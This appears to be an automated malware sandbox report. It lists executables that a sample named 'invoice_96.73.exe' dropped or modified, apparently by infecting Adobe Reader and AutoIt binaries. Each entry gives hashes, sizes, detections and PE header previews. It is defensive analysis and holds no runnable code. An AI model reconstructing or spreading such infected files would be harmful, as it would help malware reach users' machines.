                                                                                                                                                                SSDEEP:12288:DV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:pVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:0DD0F72160CD7216C85E9B5EBF27599E
                                                                                                                                                                SHA1:92C83F1CCC23BF55B2C51673F822EE9AC3B1DE25
                                                                                                                                                                SHA-256:D33CBE07BAFBCA83222989E3E89E233588EA5B1398A057BD83FC0C5D40495D38
                                                                                                                                                                SHA-512:C853B7B1D6E8838BE2694317B9711EC1E2D265FC4A0A3FF1FA689A20710A377DCC07088273418850D2C4DDF51DD0074DE403A8BB43F8BA8A353732D514F0E0F2
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=.[.y.5Xy.5Xy.5Xp..Xw.5Xj.4Y{.5Xj.6Y|.5Xj.1Yt.5Xj.0Y^.5X..1Y{.5X..4Yt.5Xy.4X..5X8.0Yz.5X8..Xx.5Xy..Xx.5X8.7Yx.5XRichy.5X........PE..L......\.........."..............................@..........................p.......%..........................................,....P..................................T...................x...........@...............X............................text...~........................... ..`.rdata..xP.......R..................@..@.data...8....0......................@....rsrc........P.......&..............@..@.reloc.......p.......:..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1707008
                                                                                                                                                                Entropy (8bit):4.406026005466474
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:WRY+FUBAV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:Wu+qBsVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:A99D6FF89B6EE86B52E6359871AFA6A0
                                                                                                                                                                SHA1:F5DF8E85DAE6514A921D8B7CBD8549EC6833A124
                                                                                                                                                                SHA-256:0216CF415D0DC8C3FF573802C380F74446E37AE8A9FEBEF767C0C88B8A7C32E8
                                                                                                                                                                SHA-512:5E1662EA27354E02D8F5F35BA19D613B20DD570852AB8CF67BD80F4BB61511C7DC94D6E2BAB040B83CCEAD54637FD5499A15359DFFF1722BF9C492766AC4F986
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@..........................P.......C..............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc.......@......................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1843200
                                                                                                                                                                Entropy (8bit):4.587554167916646
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:7KhyDZTRW8fdeLVg9N9JMlDlfjRiVuVsWt5MJMs:7K0DZT88fmgFIDRRAubt5M
                                                                                                                                                                MD5:E426DA684F5DD9483B572E354F9C2E9B
                                                                                                                                                                SHA1:4DBE45525F1BA3B27A05AD755CDA07D7FF1E47E0
                                                                                                                                                                SHA-256:3A0A679943326BD6A0733EBDFAE6BC9A40F194EA03AAEF5157FFD8F93628DEFD
                                                                                                                                                                SHA-512:526DE92544CAA4683B446A9B18E21779E667C3E5DFF7122E3A2C1F480D2EF9F7FABF3EAB0C72EE0DB2E2FE539E84D918D3166A4CE485AA4A20A30A69BFB843AD
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d... _.l...].`...^.q...[.`..._.m.....e..C...n..d......).k..C.C.r..C.Y.e..d...e..C.\.e..Richd..................PE..L......X............................-.............@..........................`.......&..................................................P...............................................................@............................................text...k........................... ..`.rdata..............................@..@.data...l...........................@....rsrc...P...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1577472
                                                                                                                                                                Entropy (8bit):4.157281945299063
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:gYmIjE72V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:g7mVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:04408308F16C1D6310905555DBBDB31B
                                                                                                                                                                SHA1:EDEFFD82269C62B559A351BE39C78C2B581FA983
                                                                                                                                                                SHA-256:5EDF76B9D4349429EEA2F8F37862901C85F9B5858C2E4212121AFAC1784879D9
                                                                                                                                                                SHA-512:A0335B4785A8A3B9C4CE0CD1D6D60BE77897B5C506E5A6F4D49ABBEFB973239BCB3BEB16123FB1D2D34070B538D7504B8C8681D3C2D47981273457C9B217A151
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................T.............................{............................Rich..........................PE..L.....6P.....................f......<3............@..........................`......i_..........................................x....P..............................................................p...@............................................text...)........................... ..`.rdata..v7.......8..................@..@.data...$-... ......................@....rsrc........P......................@..@.reloc.......`......."..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1595392
                                                                                                                                                                Entropy (8bit):4.195270947705186
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:e5YyV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:exVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:93ECC0182FD713DB083D28EB0774B76C
                                                                                                                                                                SHA1:E336788384C1A559F0EF74A0BF5A15EEC193C63E
                                                                                                                                                                SHA-256:5F2C1694CDF9DF24A7F4E8C3EF6DF744AF58F61411DF22CD2E6E1E6D6606D302
                                                                                                                                                                SHA-512:198AB2E8771409234260197AFE3ABEF48BEFF3BB2D4F0FAEE65618A6039AAB9F3C034A7E6E867C5114F3E4B838AEBA5A0E819315E956A85119900FAFC1AC1298
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............n..n..n..?"..n..<...n..<#..n..<...n..<"..n.~....n.~....n..n.7n..."..n...&..n..<...n..nT..n......n.Rich.n.................PE..L...f..Y.....................b...............0....@..................................g......................................._......................................P2..8............................;..@............0...............................text............................... ..`.rdata..4<...0...>... ..............@..@.data........p.......^..............@....rsrc................b..............@..@.reloc...............h..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1732608
                                                                                                                                                                Entropy (8bit):4.386290156972333
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:ZZKK0HMYcykV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:3ZpbVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:898B09A3E346C141493C7DEAD503AC53
                                                                                                                                                                SHA1:810EF47FFAA4FAE8B917CD51A350F2B8161333BF
                                                                                                                                                                SHA-256:53900E600713BCB8A95F17627953DA895E9EB6203F87427F21EC7BBAF079E048
                                                                                                                                                                SHA-512:C68A1B8D9BDD62F8ACE8A197D7EA8F31B6C52003B3C693B57B09EE882E34CE94E9AC81999761136D8C58FEC7546039477569918171F29D1AAB721E9A8012F62D
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G............E......E.,....E...;..D......%=.....%8.........D.......(......d....D-....Rich...................PE..d...t..Y.........."......T...h......XC.........@.....................................F.... .................................................PV..d...............X................... t..8...............................p............p..x............................text....R.......T.................. ..`.rdata.......p.......X..............@..@.data...pE...p... ...L..............@....pdata..X............l..............@..@.rsrc...............................@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1543168
                                                                                                                                                                Entropy (8bit):4.075564156725552
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:RFyiV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:Hy6Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:5797A8B1CAF52315AD82E580FACFC1E6
                                                                                                                                                                SHA1:27E45EEED5F73D27A52A748559CCFFF128B0F30B
                                                                                                                                                                SHA-256:D2ED6F86AA37CFCAC56D790359E087E67D8A21BD6AAFFD44B856D471ACA5CE8F
                                                                                                                                                                SHA-512:B4FCDFB144D9519346F5EC8B82A3CA6A38FDC1A42D067BC6B9EA1D49967D2661CE2CCDF1D7AA082DEEF5EFDE78097D1BD231F2734BBE016941D7847DF49F7D38
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................_..................................................3......[..........Rich...........................PE..L...[..\.................P...d.......P.......`....@.....................................................................................p...........................p...T..............................@............`...............................text....N.......P.................. ..`.rdata..rG...`...H...T..............@..@.data...\...........................@....rsrc...p...........................@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1599488
                                                                                                                                                                Entropy (8bit):4.16638758560332
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:irQl8HoaV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:5hiVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:CA49B6DF517028B16EDE32892D2AFFDE
                                                                                                                                                                SHA1:9713125FA4944BFD4B0200D947A9FC334B957681
                                                                                                                                                                SHA-256:D0D6FCFFB81FBBDB95FDCBC1448C2F3D1789A3E025C5B12C7E64BDCCA5FA9FDC
                                                                                                                                                                SHA-512:92980ABB3255EAD24379EAEF98B1ECCA973AE35FDE4F4284F5FEEE0550C95E3C5B9F518F162E1FCC10706386A176971E2C319A532C376E56EBB560D9D4556C34
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...NY..NY..NY.JX..NY.MX..NY.KX..NY..MX..NY..KX..NY..JX..NY.OX..NY..OY..NY.KX..NY..Y..NY...Y..NY.LX..NYRich..NY................PE..d......\.........."............................@.......................................... .................................................\k..(...................................PV..T............................V..................@............................text... ........................... ..`.rdata..............................@..@.data................h..............@....pdata...............r..............@..@.rsrc...............................@..@.reloc..............................@...........................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1687552
                                                                                                                                                                Entropy (8bit):4.313818645494306
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:1TjfjLHPQMNUV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:trnhWVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:75D97E572A9013194CAE6738A4FB31C7
                                                                                                                                                                SHA1:5EFBB68D9F7982E2DEAEAEB4B450593632709E2F
                                                                                                                                                                SHA-256:45C882127753B3D5756BA1FF9FAC3FF9AA201BD496D7220BBA33131AD87622E3
                                                                                                                                                                SHA-512:0EA690AC32F9A33936F1AEAA5CA87E52D39CF3B589779AEE09D7BF3EC03D982573CCB9C3B1F9962A4624A852861C6297DE9F114952D8557295098E70E111B53A
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...Z.H.Z.H.Z.H...H.Z.H..#H.Z.H.."H.Z.H."PH.Z.H.Z.H.Z.H).&H.Z.H...H.Z.H.ZTH.Z.H)..H.Z.HRich.Z.H................PE..L......U..........................................@...........................".....x...........................................<.......................................................................@............................................text............................... ..`.rdata..Z).......*..................@..@.data...h...........................@....rsrc...............................@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1699840
                                                                                                                                                                Entropy (8bit):4.438659403542636
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:Stymff2j6BaOV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:Mc6B/Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:0C5634087A7A7068E21A81F375727BD7
                                                                                                                                                                SHA1:9BDFEAA5BC124E619999D32939FDE60B82CAEE90
                                                                                                                                                                SHA-256:A1EA1F9A370835EAF7E9DC1C5942CCAF1B0A77B251F0062138F46456A87D8E97
                                                                                                                                                                SHA-512:0884C44F4E7B36EBE5DDCF4CD16CE6A909CDF298C2E2112A97BC66049D56E00CFD49E956292D8550038E45120AC6B8C6AC700BE3A0E4D0C9426CDF1B6A80692B
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U2s.4\ .4\ .4\ .f. .4\ .f. .4\ .f. .4\ .L. .4\ .4] m4\ w.. .4\ .f. .4\ .4. .4\ w.. .4\ Rich.4\ ................PE..L......U.........."..................c............@...........................'......5.......................................f..........0............................................................a..@............................................text...G........................... ..`.rdata...d.......f..................@..@.data...L............f..............@....rsrc...0............x..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1719296
                                                                                                                                                                Entropy (8bit):4.435603618413048
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:rZ1Cjmff2jrV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:rZ1nchVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:AEFE4C5BE8C5EF6327CDAF133F7CC9F1
                                                                                                                                                                SHA1:2D704BDF5DE5CD64C2CC8420094C7A64239DBABE
                                                                                                                                                                SHA-256:AD79A3793E07A165135CE6A4598EF238EB0D9208B13231DB3EF7166EC29E8C79
                                                                                                                                                                SHA-512:3883704CBB891340828CA77B07322E3C4F7A5D6CF94B0747E9E7E963686D0ED5D336016288BAC56E5A169F1544BC9AA2C46A74D2587D5EAA37DDD127C371DB18
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................f......g.....X..........._...^.b.....\........^.Y...Rich..........PE..d......U.........."..........,......|y.........@.............................P'......_.... .............................................................0...............................................................p............0..@............................text............................... ..`.rdata.......0....... ..............@..@.data...............................@....pdata..............................@..@.rsrc...0...........................@..@.reloc.......`.......\..............@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1964032
                                                                                                                                                                Entropy (8bit):7.7204574288691346
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:W4q2jqcpGen6e9zVvZUDZngFIDRRAubt5M:W4q/YB68VvZtUf
                                                                                                                                                                MD5:0F31D923017D4C09697139E9672FFFEE
                                                                                                                                                                SHA1:F2E8CD046379687EDBD1C930CA5627A663D547BA
                                                                                                                                                                SHA-256:1BFD3673EC9ADEBC9E4C249BCF7090232121AEE16A7AC5220B7014EA3E6875F3
                                                                                                                                                                SHA-512:5F89E25E1AB89E46EA4AB1F7705E0EA8D07FEECA4D18E8FCD0D62131144CB61F72322B50E1F3B739D27114D0DFF830AC05242184D82704601C3566B25A8B079C
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S..S..S.....S......S.....S..C...S..C...S..R.!.S.b"....S.....S.....S.b"...S.Rich.S.........................PE..L......U..........#..................v............@..........................`.......n...................................................|...........................................................i..@............................................text............................... ..`.rdata..<...........................@..@.data...lW....... ..................@....rsrc....`.......P..................@...................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2005504
                                                                                                                                                                Entropy (8bit):7.675161153877697
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:A4Ext4q2jqcpGen6e9zVvZUDZngFIDRRAubt5M:An4q/YB68VvZtUf
                                                                                                                                                                MD5:81BBA3A263CBEAC75B842C1B8DA770E0
                                                                                                                                                                SHA1:42C1A8C25CB3CF68601C7AF00F3113B4590CE1B9
                                                                                                                                                                SHA-256:2C6E5EB5D8E277B7328A8EE0143CF21D61F4FB3969CAEC655A3C32DDB7990E1D
                                                                                                                                                                SHA-512:8E382FD4887A54551063AF15087D65F7C4A5BEB865D7EFFF6D42E43C3C6D9FFB3C59B1F174C7C41B54DE77AB160755D436F4368A99F626FCBA857C5652F748E0
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............H..H..H..pHr..H..OH..H..qH.H.E^H..H.E[H..H..H)..Hf$uH.H..KH..H..H..Hf$NH..HRich..H........PE..d......U..........#............................@.....................................`.... .................................................t............|..........................................................`...p............................................text...{........................... ..`.rdata...C.......D..................@..@.data....k... ...,..................@....pdata........... ...*..............@..@.rsrc....`.......P...J..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1610752
                                                                                                                                                                Entropy (8bit):4.148018510943642
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:PvXk1EV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:3k14Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:E48801CC2E48B078A0771680629B02BC
                                                                                                                                                                SHA1:750A2B38C492474CCCC96A99F15F343BA5D48BED
                                                                                                                                                                SHA-256:98132325142A5627663B923238B5466884BECAE87EF7BD1A59967280F6355469
                                                                                                                                                                SHA-512:D8C18FB33432F512DAF4B7BEBAA927A53C9D01B883B7FC2B830D0A4880EE7C0B7DC405FE2941F88E522ACE6066DEAC64DD454A7C55C664216EEDEDE18936594B
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........c...c...c...1I..c...1w..c...1H.c....;..c...c..c....,..c..x.M..c...1s..c...c?..c..x.v..c..Rich.c..........PE..L......U............................k!............@..................................7......................................|...d....p..................................................................@...............p............................text............................... ..`.rdata...R.......T..................@..@.data....2...0......................@....rsrc........p......................@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):1630720
                                                                                                                                                                Entropy (8bit):7.232816007706908
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:cUdZ4gviAgdj8pRIy+taTPigFIDRRAubt5M:cR5j8pDrUf
                                                                                                                                                                MD5:80849CEF08FA58BE5BD6D74445FE4E70
                                                                                                                                                                SHA1:3BCA76567CCFD0CE2B47DA0D63607CBDAEF368C7
                                                                                                                                                                SHA-256:B9105E5B148478FA991267C8D287FA2FE66A0D6018E641BA473DA7F7970E6DD1
                                                                                                                                                                SHA-512:B4FCEB9B6DD118B9D73D3E46B5D9CAE4A1047D0198FF05EE3E42D537FEB9F19D2125DB54500F87D4C14AA4616A383068BDDDD23E71663C59C893330C5105287B
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v.Th2.:;2.:;2.:;.b.;3.:;t..;..:;t..;+.:;t..;..:;;..;:.:;;..;3.:;;..;..:;2.;;..:;.\.;b.:;.\.;3.:;?..;3.:;2.;0.:;.\.;3.:;Rich2.:;........................PE..d......U..........".................d..........@.......................................... ...@...............@..............................u..|............p...i..................`...............................p...p............... ............................text...i........................... ..`.rdata..............................@..@.data...0........^..................@....pdata...i...p...j..................@..@.rsrc................Z..............@..@.reloc..............................@...........................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1829964
                                                                                                                                                                Entropy (8bit):7.265211258010209
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:49152:FaKJTypekiPKQTvOTaTfjBxr8RWgFIDRRAubt5M:dGpeBPBDXkUf
                                                                                                                                                                MD5:865DCBC6AA37DD1B7BFF0A0F37B76755
                                                                                                                                                                SHA1:2672CD747FAEDD7D1E58770F52F1E2A04B1B3136
                                                                                                                                                                SHA-256:B4217DBBCCB010FAC1E73EF0CE11B9C37627F6C734E1EE0A0E0EB8019A10DF13
                                                                                                                                                                SHA-512:A7198BE8D56208D5C54774CBD7E3B6EB42A1B52574311CB381AF5C21EC081EA0F24CE84875FF97235F88F0AFD4D0B55507DC139CC1EADA3642E1FA9A0A9EB8B5
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<.._].._].._]..R. ..]..R....]..R.!.L\..V%B.\]..V%R.F].._]...\....$.=]......^]..R...^].._]V.^]......^]..Rich_]..........................PE..L......U.....................j....................@...........................%.....................................................................................................................0...@............................................text............................... ..`.rdata..............................@..@.data...<...........................@....rsrc................J..............@..@........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\invoice_96.73.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1658880
                                                                                                                                                                Entropy (8bit):4.312984783745722
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:lxGBcTlkVg9N9JMlDlfjRiVuVsWt5MJMs:LGyhkgFIDRRAubt5M
                                                                                                                                                                MD5:38BDB885A492FB07195A5DF3F45BA0BB
                                                                                                                                                                SHA1:C520EDE3BED4D97507530ECE268D619A22C41979
                                                                                                                                                                SHA-256:3101297E117D91C618EFA880714D5963CE4EDAFEAE5A3252F1154E72A12877E0
                                                                                                                                                                SHA-512:6BBB100B03308CC0FB0F2638592F2080837AF741B8DEDB7705EA2B06FA67D038DC9D2FFB8B943BDFB8DEBC3E0C2D9C9828DB48637EE49084685A5933874F293F
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
